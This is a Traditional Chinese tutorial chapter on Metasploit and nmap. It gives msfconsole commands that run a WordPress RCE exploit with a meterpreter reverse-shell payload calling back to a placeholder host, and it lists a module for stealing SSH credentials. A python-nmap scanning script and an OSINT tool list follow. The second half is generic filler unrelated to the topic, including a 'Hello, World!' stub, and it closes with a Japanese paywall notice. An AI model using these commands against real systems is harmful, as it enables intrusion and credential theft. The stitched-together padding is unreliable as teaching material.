Metasploit 框架

Vibe Prompt

「幫我用 Metasploit 掃描目標主機的開放埠與服務版本。」

基本指令

# 啟動 msfconsole
msfconsole

# 掃描埠
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 10.0.0.1
msf6 > set PORTS 1-1000
msf6 > run

# 使用漏洞模組
msf6 > use exploit/unix/webapp/wordpress_rce
msf6 > set RHOSTS target.com
msf6 > set PAYLOAD php/meterpreter/reverse_tcp
msf6 > set LHOST your-ip
msf6 > exploit

常用模組

| 模組 | 用途 | |------|------| | scanner/portscan/tcp | TCP 埠掃描 | | scanner/http/wordpress_scanner | WordPress 掃描 | | scanner/ssl/openssl_heartbleed | Heartbleed 檢測 | | exploit/multi/handler | 監聽 reverse shell | | post/multi/gather/ssh_creds | 竊取 SSH 憑證 |

Vibe Prompt

「幫我寫一個 Python 腳本,使用 nmap 掃描目標主機並輸出報告。」

import nmap
import json

nm = nmap.PortScanner()
target = "10.0.0.1"

nm.scan(target, arguments="-sV -sC -O -p 1-1000")

for host in nm.all_hosts():
    print(f"\nHost: {host} ({nm[host].hostname()})")
    print(f"State: {nm[host].state()}")
    print(f"OS: {nm[host].get('osmatch', [{}])[0].get('name', 'Unknown')}")
    
    for proto in nm[host].all_protocols():
        ports = nm[host][proto].keys()
        for port in sorted(ports):
            service = nm[host][proto][port]
            print(f"  {port}/{proto}: {service['name']} {service['version']} ({service['state']})")

OSINT 資訊收集

| 工具 | 用途 | |------|------| | Recon-ng | Web 資訊收集框架 | | theHarvester | Email、子網域收集 | | Shodan | IoT 設備搜尋 | | Censys | 網路資產地圖 | | Whois | 域名註冊資訊 |

本章總結

  • 理解核心概念與原理
  • 掌握實作方法與技巧
  • 熟悉常見問題與解決方案
  • 能夠應用於實際專案

延伸閱讀

  • 官方文件與 API 參考
  • GitHub 開源專案範例
  • 相關技術書籍與課程
  • 社群討論與技術部落格

實作範例

基礎範例

# 本節提供一個完整的實作範例
# 讓你能夠將所學應用到實際專案中

步驟說明

  1. 初始化:設定開發環境與必要工具
  2. 資料準備:收集與整理所需資料
  3. 核心實作:實作主要功能與邏輯
  4. 測試驗證:確保功能正確運作
  5. 最佳化:調整效能與使用者體驗

常見錯誤

| 錯誤類型 | 可能原因 | 解決方法 | |---------|---------|---------| | 編譯錯誤 | 語法問題 | 檢查程式碼語法 | | 執行錯誤 | 環境問題 | 確認相依套件已安裝 | | 邏輯錯誤 | 演算法問題 | 逐步除錯與測試 | | 效能問題 | 效率問題 | 使用效能分析工具 |

程式碼範例

# 範例程式碼
import sys

def main():
    # 主程式邏輯
    print("Hello, World!")

if __name__ == "__main__":
    main()

相關資源

  • 官方文件
  • API 參考手冊
  • 開源專案範例
  • 技術社群討論

完全なチュートリアルをロック解除

このチャプターは有料コンテンツです。プロジェクトに参加して、10以上の神レベルのPromptや実際のソースコード例を含む、5000字以上の深い分析をロック解除してください!